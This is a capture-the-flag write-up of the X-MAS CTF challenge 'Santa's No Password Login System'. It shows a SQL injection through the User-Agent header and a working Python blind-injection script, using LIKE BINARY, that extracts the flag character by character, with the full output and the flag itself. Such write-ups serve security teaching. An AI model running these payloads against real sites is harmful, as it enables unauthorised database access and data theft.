Posts X-MAS CTF: Santa's No Password Login System
Post
Cancel

X-MAS CTF: Santa's No Password Login System

X-MAS CTF: Santa’s No Password Login System

The challenge description is:

Img

And once we go to the main page we are greeted with the following:

Img

I knew the cookies didn’t have anything to do with the challenge, given that they were used in another one, and that there was some kind of verification with some headers (no other data was being passed). After a lot of tests, It turned out that the user-agent field contained a SQL injection vulnerability!

Img

I tried to pass something that would evaluate to true: ' OR '1'='1. Nothing changed apart from the access denied thing, instead of that I got a Welcome message:

Img

That brought to mind a blind SQL injection. There was a problem, though. I didn’t know what was the name of the parameter that the SQL was querying…

After quite a lot of time I found out that it was ua. Quite silly (user-agent -> ua).

I tried some things, like checking the length of the ua. The message indicated whether my query was true (Welcome) or false (Access denied).

Img

Img

So the ua is longer than 1 character and shorter than 40. With that method I found out that the ua is 37 chars long:

Img

Then, I tried to extract the value with a blind SQL method: LIKE BINARY. What this does is it compares the start of the ua to some substring we provide.

I tried checking if the first char was A, but it wasn’t:

Img

Then, to check that the method worked I used the wildcard %, which substitutes any character any number of times (any string). And indeed it worked!

Img

Then, I thought that the ua had to be the flag, so I tried with X%:

Img

I was right! It is the flag. Now, the only thing left is automate this task, as it is rather tedious to do this by hand. I wrote a simple python script that does this for me:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import urllib2

flag = ""

chars = '-\{\}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'

for i in range(0, 37):
    for i in range(0, len(chars)):
        str = """' OR ua LIKE BINARY "{}%";#""".format(flag+chars[i])
        headers =  {
                'User-Agent': str,
        }

        req=urllib2.Request("http://199.247.6.180:12003/", None, headers)
        response=urllib2.urlopen(req).read()

        if "Welcome" in response:
            flag += chars[i]
            print flag
            break

I run it and see that it works and the flag gets echo’ed!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
python blind_sql.py
X
X-
X-M
X-MA
X-MAS
X-MAS{
X-MAS{E
X-MAS{EV
X-MAS{EV3
X-MAS{EV3R
X-MAS{EV3RY
X-MAS{EV3RY0
X-MAS{EV3RY0N
X-MAS{EV3RY0NE
X-MAS{EV3RY0NE_
X-MAS{EV3RY0NE_F
X-MAS{EV3RY0NE_F3
X-MAS{EV3RY0NE_F34
X-MAS{EV3RY0NE_F34R
X-MAS{EV3RY0NE_F34R5
X-MAS{EV3RY0NE_F34R5_
X-MAS{EV3RY0NE_F34R5_T
X-MAS{EV3RY0NE_F34R5_TH
X-MAS{EV3RY0NE_F34R5_TH3
X-MAS{EV3RY0NE_F34R5_TH3_
X-MAS{EV3RY0NE_F34R5_TH3_B
X-MAS{EV3RY0NE_F34R5_TH3_BL
X-MAS{EV3RY0NE_F34R5_TH3_BL1
X-MAS{EV3RY0NE_F34R5_TH3_BL1N
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_G
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M3
X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M3}

We finally get that the flag is: X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M3}.


Diego Bernal Adelantado
This post is licensed under CC BY 4.0 by the author.